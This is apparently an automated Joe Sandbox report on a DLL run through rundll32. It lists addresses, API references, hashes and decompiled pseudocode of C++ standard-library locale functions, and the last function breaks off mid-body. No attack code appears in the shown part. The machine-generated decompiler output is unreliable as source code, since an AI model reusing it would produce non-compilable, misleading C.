                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F422
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F42C
                          • int.LIBCPMT ref: 6E20F443
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F47D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F49D
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F4BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
                          • Instruction ID: a5d1dd125845e15b005faedafa4bb64f4ef57cd44b46559f3334f0af271d1c59
                          • Opcode Fuzzy Hash: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
                          • Instruction Fuzzy Hash: 4411E375A1051E9BCF00EBE0CC94AEEB77BBF44B25F240918E9116B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E20A24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t94 =  *0x6e2c6cd0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6E1E161C(0x6e2c6cbc);
				_t71 = _a8;
				_t36 = E6E1E171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t91, _t94, 0x14);
							E6E206653( &_v20, 0);
							_t95 =  *0x6e2c6cd4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6E1E161C(0x6e2c6cc0);
							_t78 = _a8;
							_t92 = E6E1E171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6E1E1438(_t82);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6e26ba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6E206FD3(__eflags, _t92);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6e2c6cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6E206FD3(__eflags, _t91);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6e2c6cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}















                          0x6e20a24b
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a27c
                          0x6e20a281
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A252
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A25C
                          • int.LIBCPMT ref: 6E20A273
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20A2AD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A2CD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A2EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
                          • Instruction ID: 636a2fded1faa2f8d9604b56e602cb01600b6586baba97773650e95b435a012b
                          • Opcode Fuzzy Hash: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
                          • Instruction Fuzzy Hash: D31106B5A0052E8FCF00DBE4C898AEDB77BBF54714F140918E4116B2D0DF749A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t726 - 0x14, 0);
				_t693 =  *0x6e2c6dec; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6E1E161C(0x6e2c6d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6E2066BA(_t726 - 0x14);
					return E6E220075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6E210F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t726 - 0x20);
							E6E223D74(_t726 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t676, _t693, 0x14);
							E6E206653(_t726 - 0x14, 0);
							_t694 =  *0x6e2c6dbc; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6E1E161C(0x6e2c6d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6E2066BA(_t726 - 0x14);
								return E6E220075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6E210FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t726 - 0x20);
										E6E223D74(_t726 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t513, _t677, _t694, 0x14);
										E6E206653(_t726 - 0x14, 0);
										_t695 =  *0x6e2c6df0; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6E1E161C(0x6e2c6d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6E2066BA(_t726 - 0x14);
											return E6E220075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6E211057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t726 - 0x20);
													E6E223D74(_t726 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t513, _t678, _t695, 0x14);
													E6E206653(_t726 - 0x14, 0);
													_t696 =  *0x6e2c6dc0; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6E1E161C(0x6e2c6d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6E2066BA(_t726 - 0x14);
														return E6E220075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6E2110BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t726 - 0x20);
																E6E223D74(_t726 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t513, _t679, _t696, 0x14);
																E6E206653(_t726 - 0x14, 0);
																_t697 =  *0x6e2c6df8; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6E1E161C(0x6e2c6da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6E2066BA(_t726 - 0x14);
																	return E6E220075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6E211127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t726 - 0x20);
																			E6E223D74(_t726 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t513, _t680, _t697, 0x14);
																			E6E206653(_t726 - 0x14, 0);
																			_t698 =  *0x6e2c6df4; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6E1E161C(0x6e2c6da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6E2066BA(_t726 - 0x14);
																				return E6E220075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6E2111AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t726 - 0x20);
																						E6E223D74(_t726 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t513, _t681, _t698, 0x14);
																						E6E206653(_t726 - 0x14, 0);
																						_t699 =  *0x6e2c6dc8; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6E1E161C(0x6e2c6d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6E2066BA(_t726 - 0x14);
																							return E6E220075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6E211230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t726 - 0x20);
																									E6E223D74(_t726 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t513, _t682, _t699, 0x14);
																									E6E206653(_t726 - 0x14, 0);
																									_t700 =  *0x6e2c6dc4; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6E1E161C(0x6e2c6d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6E2066BA(_t726 - 0x14);
																										return E6E220075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6E2112B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t726 - 0x20);
																												E6E223D74(_t726 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t513, _t683, _t700, 0x14);
																												E6E206653(_t726 - 0x14, 0);
																												_t701 =  *0x6e2c6dd8; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6E1E161C(0x6e2c6d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6E2066BA(_t726 - 0x14);
																													return E6E220075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6E211339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t726 - 0x20);
																															E6E223D74(_t726 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t513, _t684, _t701, 0x14);
																															E6E206653(_t726 - 0x14, 0);
																															_t702 =  *0x6e2c6db0; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6E1E161C(0x6e2c6d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6E2066BA(_t726 - 0x14);
																																return E6E220075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6E2113A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t726 - 0x20);
																																		E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t513, _t685, _t702, 0x14);
																																		E6E206653(_t726 - 0x14, 0);
																																		_t703 =  *0x6e2c6ddc; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6E1E161C(0x6e2c6d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6E2066BA(_t726 - 0x14);
																																			return E6E220075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6E211409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t726 - 0x20);
																																					E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t513, _t686, _t703, 0x14);
																																					E6E206653(_t726 - 0x14, 0);
																																					_t704 =  *0x6e2c6de0; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6E1E161C(0x6e2c6d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6E2066BA(_t726 - 0x14);
																																						return E6E220075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6E211471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t726 - 0x20);
																																								E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t513, _t687, _t704, 0x14);
																																								E6E206653(_t726 - 0x14, 0);
																																								_t705 =  *0x6e2c6dfc; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6E1E161C(0x6e2c6da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6E2066BA(_t726 - 0x14);
																																									return E6E220075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6E2114EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t726 - 0x20);
																																											E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t513, _t688, _t705, 0x14);
																																											E6E206653(_t726 - 0x14, 0);
																																											_t706 =  *0x6e2c6dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6E1E161C(0x6e2c6d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6E2066BA(_t726 - 0x14);
																																												return E6E220075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6E211558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t726 - 0x20);
																																														E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t513, _t689, _t706, 0x14);
																																														E6E206653(_t726 - 0x14, 0);
																																														_t707 =  *0x6e2c6e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6E1E161C(0x6e2c6dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6E2066BA(_t726 - 0x14);
																																															return E6E220075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6E2115C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t726 - 0x20);
																																																	E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t513, _t690, _t707, 0x14);
																																																	E6E206653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6e2c6dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6E1E161C(0x6e2c6d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6E2066BA(_t726 - 0x14);
																																																		return E6E220075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6E21162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6E1E1438(_t625);
																																																				E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e26851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6e26c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6E21542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6E220075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6E206FD3(__eflags, _t691);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6e2c6dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6E206FD3(__eflags, _t690);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6e2c6e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6E206FD3(__eflags, _t689);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6e2c6dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6E206FD3(__eflags, _t688);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6e2c6dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6E206FD3(__eflags, _t687);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6e2c6de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6E206FD3(__eflags, _t686);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
